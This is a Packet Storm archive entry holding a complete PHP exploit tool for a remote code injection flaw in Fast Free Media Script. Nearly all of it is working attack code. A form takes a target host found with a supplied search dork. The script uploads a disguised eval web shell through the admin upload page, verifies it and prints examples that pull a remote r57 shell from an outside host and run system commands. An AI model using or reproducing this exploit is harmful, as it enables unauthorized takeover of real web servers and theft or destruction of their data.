fastfree-rfi.txt

2008-06-09T00:00:00
ID PACKETSTORM:67082
Type packetstorm
Reporter Liz0ziM
Modified 2008-06-09T00:00:00

Description

                                        
                                            `<?php  
error_reporting("E_ALL");  
ini_set("max_execution_time",0);  
ini_set("default_socket_timeout",5);  
  
function yolla($host,$paket)  
{  
global $veri;  
$ac=fsockopen(gethostbyname($host),80);  
if (!$ac) {  
echo 'Unable to connect to server '.$host.':80'; exit;//Baðlanamaz ise  
}  
fputs($ac,$paket);  
  
$veri="";  
while (!feof($ac)) {  
$veri.=fread($ac,1);  
  
}  
fclose($ac);  
}  
  
?>  
<h2>Fast Free Media Script Remote Code Ýnjection Exploit</h2>  
<p>Coded By Liz0ziM</p>  
<p>Web:<a href="http://www.biyosecurity.com" target="_blank">www.biyosecurity.com</a> </p>  
<p>Dork:"Powered by FastFreeMedia.com" & inurl:cat-1-p0.html & inurl:page.php?page=topvids & inurl:page.php?page=topgames </p>  
<form method="POST" action="">  
<p>TARGET HOST:  
<input name="host" type="text" />   
Example:<strong>www.sexwhispers.com</strong></p>  
<p>TARGET PATH: <input name="klasor" type="text" />  
Example:<strong>/</strong> or <strong>/scriptpath/</strong> </p>  
<p>ADMÝN PATH: <select name="admin"><option value="admincp">admincp</option><option value="admin">admin</option> </select>  
</p>  
<p><input name="yolla" type="submit" value="Send" /></p>  
</form><br />  
<? if($_POST[yolla]){  
  
$host=$_POST[host];  
$klasor=$_POST[klasor];  
$admin=$_POST[admin];  
$p=$klasor.$admin."/uploadfiles.php";  
echo '<font color="red"><b>Sending Exploit..</b></font><br>';  
sleep(5);  
$data='  
-----------------------------17459113492913  
Content-Disposition: form-data; name="biyosecurity"; filename="bst.php"  
Content-Type: image/jpeg;  
  
<?php error_reporting(0); set_time_limit(0); echo "biyosecurity"; eval(stripslashes(urldecode($_GET[liz0]))); ?>  
-----------------------------17459113492913  
  
';  
$paket ="POST ".$p." HTTP/1.0\r\n";  
$paket.="Content-Type: multipart/form-data; boundary=---------------------------17459113492913\r\n";  
$paket.="Host: ".$host."\r\n";  
$paket.="Content-Length: ".strlen($data)."\r\n";  
$paket.="Connection: close\r\n\r\n";  
$paket.=$data;  
yolla($host,$paket);  
  
sleep(5);  
$packet ="GET /media/upload/bst.php HTTP/1.0\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Connection: Close\r\n\r\n";  
yolla($host,$packet);  
if (eregi("biyosecurity",$veri))  
{  
$mesaj='  
<font color="green">Exploit succeeded...</font>  
<br>  
<b>insert evil code :</b>http://'.$host.$klasor.'media/upload/bst.php  
<br>  
<b>Example:</b> http://'.$host.$klasor.'media/upload/bst.php?liz0=include($_GET[x]);&x=http://www.r57.li/r57.txt?  
<br>  
<b>Example2:</b> http://'.$host.$klasor.'media/upload/bst.php?liz0=passthru($_GET[x]);&x=ls  
';  
  
}  
else  
{  
$mesaj='<font color="red">Exploit Failed !</font>';  
}  
  
}  
  
echo $mesaj;   
?>`